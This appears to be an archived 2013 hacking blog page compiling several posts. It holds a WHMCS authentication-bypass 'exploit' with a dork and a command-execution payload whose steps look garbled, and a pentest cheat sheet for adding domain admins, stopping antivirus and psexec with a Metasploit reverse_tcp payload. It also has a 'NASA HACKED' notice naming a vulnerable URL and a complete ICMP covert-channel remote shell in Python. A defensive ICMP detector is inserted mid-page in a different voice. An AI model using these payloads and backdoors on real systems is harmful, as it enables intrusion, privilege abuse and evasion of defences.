Jan 5, 2013

Interesting links from packetstormsecurity.com today [2013-01-05]

Indrajith Mini Shell 2.0
http://packetstormsecurity.com/files/119233/Indrajith-Mini-Shell-2.0.html

WordPress BulletProof Security Cross Site Scripting
http://packetstormsecurity.com/files/112618/wpbulletproof-xss.txt

pfSense 2.0.1 XSS / CSRF / Command Execution
http://packetstormsecurity.com/files/119256/pfSense-2.0.1-XSS-CSRF-Command-Execution.html

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 4, 2013

WHMCS 5.x versions suffer from a cookie-validation vulnerability

WHMCS 5.x versions suffer from a cookie-validation vulnerability, where sessions can be modified and authentication can be easily bypassed.

##################################################
# Description : WHMCS 5.x Authentication Bypass Vulnerability
# Author : Agd_Scorp
# Contact: vorscorp@hotmail.com
# Version : 5.x
# Link : http://www.whmcs.com/order-now/
# Date : Monday, December 31, 2012
# Dork : intext:Powered by WHMCompleteSolution
##################################################

Recommended: You must have BeEF or Tamper Data already installed; I do not recommend doing this process manually.

# The Fact:

WHMCS 5.0 is completely vulnerable to this vulnerability, but in the 5.1 version WHMCS has added extra cache-security, so I've added an extra payload for it; you can do the exploitation process without the payload in the 5.0 version.


# The Exploitation

http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}

After you have successfully entered that into your browser, the page will lag for a bit due to the cache-validation, which we, of course, will change. ;-)


When the page is loading, quickly open Tamper Data and change the loading POST_SESSION request & the payload to this:

POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";

Payload: $payload = "login=1&title=1&execorder=0&hook=urlencoded&redirect={admin_index}";


# The Result

Once you have done this process, you will automatically be redirected to the admin page, although if the administrator has enabled cache-security, this process will fail.

# Solution & Fix

No solution & fix, just wait for the WHMCS team to release a patch for this vulnerability.



Source: http://cxsecurity.com/issue/WLB-2013010026


Cheat Sheet For Pentest By AverageSecurityGuy

Mount Shares

# Mount Windows Share with Null Session
net use x: \\server\share "" /u:

# Mount NFS share on Linux
mount -t nfs server:/share /mnt/point

# Mount Windows Share on Linux
mount -t cifs //server/share -o username=,password= /mnt/point

Add Administrative Accounts

# WINDOWS: Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# WINDOWS: Add local user and put them in the local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# LINUX: Add a new user to linux and put them in the wheel group
useradd -G wheel username

# LINUX: Set the new user's password
passwd username

# LINUX: If the shell is non-interactive set the password using chpasswd
echo "username:newpass"|chpasswd

stdapi_sys_process_execute: Operation failed: 1314

# If you get this error while trying to drop to a shell
# in meterpreter, try the command below. This is a known bug
# in meterpreter.
execute -f cmd.exe -c -i -H

Metasploit: Use custom executable with psexec

# Generate an executable
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe

# Setup multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...

# In another msfconsole setup psexec
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
msf exploit(psexec) > exploit

# If everything works then you should see a meterpreter
# session open in multi/handler

Disable Antivirus

# Disable Symantec Endpoint Protection
c:\program files\symantec\symantec endpoint protection\smc -stop

Use Ettercap to Sniff Traffic

ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap

Cracking WPA/WPA2 PSK

# With John the Ripper
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

# With Hashcat
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap

Create an IP List with Nmap

nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt

Crack Passwords with John and Korelogic Rules

for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file>; done
 
Source: http://averagesecurityguy.info/cheat-sheet/ 



smbexec - A rapid psexec style attack with samba tools

If you want to download it, please go to the Source.

       smbexec
 A rapid psexec style attack with samba tools
      Original Concept and Script by PureHate & Brav0Hax
              Codename - Diamond in the Rough
             Gonna pha-q up - PurpleTeam Smash!

Source: https://github.com/brav0hax/smbexec 




NASA HACKED BY D35M0ND142..

If you want to see all of leaked information, please go to the Source.
 
::::::::::::::::::::::::::::HACKED BY D35m0nd142:::::::::::::::::::::::::::::::::::::
 
Target: http://science.gsfc.nasa.gov/
IP Address: 129.164.179.160
HTTP Server: WebServer/1.0
Vulnerability: Blind SQL Injection + WAF Bypass
Author: D35m0nd142
 
 
 
Page that has the vulnerability: http://science.gsfc.nasa.gov/sed/calendar/showevent.cfm?CalID=1319
 



Jan 2, 2013

Example Code Of Covert Channel Server & Client

These Python scripts are an ICMP covert channel that I created myself; try it :) Happy New Year 2013

Server
#!/usr/bin/python

import os, sys, socket, struct, select, time, threading, re

def checksum(payload):
    sum = 0
    countTo = (len(payload)/2)*2
    count = 0
    while count<countTo:
        thisVal = ord(payload[count + 1])*256 + ord(payload[count])
        sum = sum + thisVal
        sum = sum & 0xffffffff
        count = count + 2

    if countTo<len(payload):
        sum = sum + ord(payload[len(payload) - 1])
        sum = sum & 0xffffffff

    sum = (sum >> 16)  +  (sum & 0xffff)
    sum = sum + (sum >> 16)
    answer = ~sum
    answer = answer & 0xffff
    # Swap bytes.
    answer = answer >> 8 | (answer << 8 & 0xff00)
    return answer

def response_icmp(dest_addr, timeout,payload):
    ### Specific ICMP Packet
    covert_icmp = socket.getprotobyname("icmp")
    try:
        client = socket.socket(socket.AF_INET, socket.SOCK_RAW, covert_icmp)
    except socket.error, (errno, msg):
        # errno 1 (EPERM): raw sockets require root privileges
        if errno == 1:
            print socket.error(msg)
        sys.exit(1)
    process = os.getpid() & 0xFFFF
   
    ### Send Ping Packet
    dest_addr  =  socket.gethostbyname(dest_addr)
    data = "Covert:"+payload
    print "[%s]" % data
    my_checksum = 0
    ICMP_ECHO_REQUEST = 8

    #### pack for calculate checksum
    header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, my_checksum, process, 1)
       
    my_checksum = checksum(header + data)

    header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), process, 1)
    packet = header + data
    client.sendto(packet, (dest_addr, 1))

    client.close()
    #### return timeout

def main():
    delay=1
    check=1
    try:
        # Raw ICMP socket: receives every ICMP packet the host gets (requires root)
        server = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
        server.bind(("0.0.0.0", 0))
        server.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
        print "Binding All Interfaces in Progress..."
    except socket.error, msg:
        print "Cannot bind: %s" % msg
        sys.exit(1)

    last_message=False
    while 1:
        if check%2==0:
            receive_message = server.recvfrom(65565)
            buff = str(receive_message[0])
            #### The command travels in the echo payload after the "Covert:" marker
            extract = re.search('Covert:(.*)', buff)
            if extract is not None:
                command = extract.group(0)
                #### Command from Client (strip the 7-byte "Covert:" marker)
                cmd = command[7:]
                #### print "%s"% cmd
                #### Extract Client IP to send ICMP back; recvfrom returns (host, port)
                client_ip = receive_message[1][0]
                #### Run the command that was sent from the client
                console = os.popen(cmd)

                #### Send each output line back in its own ICMP packet
                for index, line in enumerate(console):
                    response_icmp(client_ip,delay,line)
                    last_message=True

                #### Terminator so the client knows the output is complete
                if last_message==True:
                    response_icmp(client_ip,delay,"end of shell")
                    last_message=False

        check = check + 1

    # Not reached while the loop runs; SIO_RCVALL only exists on Windows
    server.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
    exit(0)


Client
#!/usr/bin/python

import socket, re, thread, os, sys, struct, select, time , threading
from threading import *

def checksum(payload):
    sum = 0
    countTo = (len(payload)/2)*2
    count = 0
    while count<countTo:
        thisVal = ord(payload[count + 1])*256 + ord(payload[count])
        sum = sum + thisVal
        sum = sum & 0xffffffff
        count = count + 2

    if countTo<len(payload):
        sum = sum + ord(payload[len(payload) - 1])
        sum = sum & 0xffffffff

    sum = (sum >> 16)  +  (sum & 0xffff)
    sum = sum + (sum >> 16)
    answer = ~sum
    answer = answer & 0xffff
    # Swap bytes.
    answer = answer >> 8 | (answer << 8 & 0xff00)
    return answer

def receive_icmp(my_socket, ID, timeout):   
    while 1:
        recPacket, addr = my_socket.recvfrom(65565)
        payload = recPacket[28:1000]
        command = payload[7:1000]
        if command =="end of shell":
            break
        print (command)


def response_icmp(dest_addr, timeout,command):
    ### Specific ICMP Packet
    covert_icmp = socket.getprotobyname("icmp")
    try:
        client = socket.socket(socket.AF_INET, socket.SOCK_RAW, covert_icmp)
    except socket.error, (errno, msg):
        # errno 1 (EPERM): raw sockets require root privileges
        if errno == 1:
            print socket.error(msg)
        sys.exit(1)
    process = os.getpid() & 0xFFFF
   
    ### Send Ping Packet
    dest_addr  =  socket.gethostbyname(dest_addr)
    data = "Covert:"+command
    my_checksum = 0
    ICMP_ECHO_REQUEST = 8

    #### pack for calculate checksum
    header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, my_checksum, process, 1)
       
    my_checksum = checksum(header + data)

    header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), process, 1)
    packet = header + data
    client.sendto(packet, (dest_addr, 1))
    receive_icmp(client,process,1)
    client.close()
    #### return timeout

def main():
    ip = raw_input("Enter the Server IP: ")
    delay = 1
    while 1:
        command = raw_input("# ")
        if command == "quit" or command == "exit":
            break
        else:
            print("Executing Command....\n")
            response_icmp(ip,delay,command)

if __name__ == '__main__':
    main()
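From the defender's side, the channel above is visible as ICMP echo traffic whose payload is not what a normal ping carries. The following Python 3 script is an added example, not part of the original post or the author's scripts: it parses raw IPv4/ICMP packets, recomputes the ICMP checksum, and flags echo requests/replies whose payload does not match a default Linux or Windows ping, contains the "Covert:" marker used by the scripts above, or is mostly printable text (command output). It assumes packets are handed over without a link-layer header (as a raw socket or pcap reader would deliver them); the default-payload patterns are heuristics for typical ping implementations, and the sample traffic is constructed inline, not captured.

```python
"""Flag ICMP echo payloads that do not look like a default ping.

Added example (not from the original post). Assumes IPv4 packets without a
link-layer header; the "standard ping" patterns are heuristics.
"""
import struct


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


# Heuristic default payloads: iputils ping sends a 16-byte timestamp followed by
# bytes 0x10..0x37 (56 bytes total); Windows ping sends a 32-byte alphabet run.
LINUX_PING_TAIL = bytes(range(0x10, 0x38))
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def parse_ipv4_icmp(pkt: bytes) -> dict:
    """Parse the IPv4 and ICMP headers; report whether the ICMP checksum verifies."""
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 1:
        raise ValueError("not an ICMP packet")
    total_len = struct.unpack("!H", pkt[2:4])[0]
    icmp = pkt[ihl:total_len]
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", icmp[:8])
    # Recompute over the ICMP message with the checksum field zeroed
    calc = icmp_checksum(icmp[:2] + b"\x00\x00" + icmp[4:])
    return {
        "src": ".".join(str(b) for b in pkt[12:16]),
        "dst": ".".join(str(b) for b in pkt[16:20]),
        "type": icmp_type, "code": code, "id": ident, "seq": seq,
        "payload": icmp[8:], "checksum_ok": calc == csum,
    }


def classify_echo_payload(payload: bytes) -> list:
    """Return the reasons an echo payload looks suspicious (empty list = normal)."""
    if payload == WINDOWS_PING_PAYLOAD:
        return []
    if len(payload) == 56 and payload[16:] == LINUX_PING_TAIL:
        return []
    reasons = ["nonstandard-payload"]
    if b"Covert:" in payload:              # marker used by the scripts on this page
        reasons.append("covert-marker")
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in payload)
    if payload and printable / len(payload) > 0.9:
        reasons.append("text-payload")     # command lines / command output
    return reasons


def analyze(packets) -> list:
    """Return (src, dst, icmp_type, reasons) for every echo packet worth a look."""
    findings = []
    for pkt in packets:
        info = parse_ipv4_icmp(pkt)
        if info["type"] not in (0, 8):     # echo reply / echo request only
            continue
        reasons = classify_echo_payload(info["payload"])
        if not info["checksum_ok"]:
            reasons.append("bad-checksum")
        if reasons:
            findings.append((info["src"], info["dst"], info["type"], reasons))
    return findings


# --- constructed test traffic (fixtures, not captured data) -------------------
def build_ipv4_icmp(src, dst, icmp_type, ident, seq, payload, corrupt=False):
    hdr = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(hdr + payload)
    if corrupt:
        csum ^= 0x0001                     # deliberately wrong checksum
    icmp = struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     bytes(int(x) for x in src.split(".")),
                     bytes(int(x) for x in dst.split(".")))
    return ip + icmp          # IP checksum left zero; the parser does not check it


SAMPLE = [
    build_ipv4_icmp("10.0.0.5", "10.0.0.9", 8, 0x1234, 1, b"\x00" * 16 + LINUX_PING_TAIL),
    build_ipv4_icmp("10.0.0.5", "10.0.0.9", 8, 0x1234, 2, WINDOWS_PING_PAYLOAD),
    build_ipv4_icmp("10.0.0.7", "10.0.0.9", 8, 0x2222, 1, b"Covert:id"),
    build_ipv4_icmp("10.0.0.9", "10.0.0.7", 8, 0x3333, 1, b"Covert:uid=1000(user)\n"),
    build_ipv4_icmp("10.0.0.8", "10.0.0.9", 8, 0x4444, 1, b"\x00" * 16 + LINUX_PING_TAIL, corrupt=True),
]

if __name__ == "__main__":
    for src, dst, icmp_type, reasons in analyze(SAMPLE):
        print("%s -> %s type=%d %s" % (src, dst, icmp_type, ",".join(reasons)))
```

In use, feed `analyze()` the IPv4 frames from a pcap or a raw socket instead of `SAMPLE`. The checksum check matters because the hand-rolled sender above computes its checksum over a native-endian header, so a port to a big-endian host would emit echo requests the kernel silently drops while a sniffer still sees them; the printable-text test catches tunnels that change the marker string.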



Dec 30, 2012

Chrome Extensions for Pentest

One of the best Chrome extensions: it can show the geolocation, DNS, whois, routing, search results, hosting, domain neighbors, DNSBL, BGP and ASN information of every IP address (IPv4 and IPv6), including a shortcut to your public IP address. It can be used for whois, network lookup, spam database lookup and more.


It is an extension that will help in the process of penetration testing; you can easily log, edit and send HTTP requests. Request Maker only captures requests sent via HTML forms and XMLHttpRequests; it doesn't fill the log with useless information about images and style sheets.

If you don't want to share your information on the Internet, then Not Sharing My Info is the best extension for you; use this extension to substitute an anonymous alias. It can replace your real email address with a fake email address and so on.


Simply the best: after information gathering, scanning and enumeration is the second phase of the ethical hacking process, so this extension will really help you to scan open ports just like nmap.

I think there is no need to discuss the importance of proxies and anonymity in the field of hacking. Hide My Ass! operates the most popular browser-based web proxy online; this official extension enables you to easily redirect your web traffic through its anonymous proxy network.

There are different cookie editors available on Firefox; just like Firefox, we have Edit This Cookie on Chrome, which can help you to edit any cookie, add any cookie, block cookies, delete all the cookies and much more.


XSS is a bug in a web application that allows an attacker to inject their code; if you are doing penetration testing on a web application, then XSS Rays will help you to perform the test effectively and efficiently. Its core features include an XSS scanner, XSS Reverser and object inspection.


If you want to keep yourself updated with the latest exploits, shellcode and white papers, then this Exploit DB extension will help you.


Right-click on any link and scan the target with VirusTotal, free and easy. It provides an online virus scanner; an amazing extension.

Source: http://www.ehacking.net/2011/07/chrome-extensions-for-security.html


 
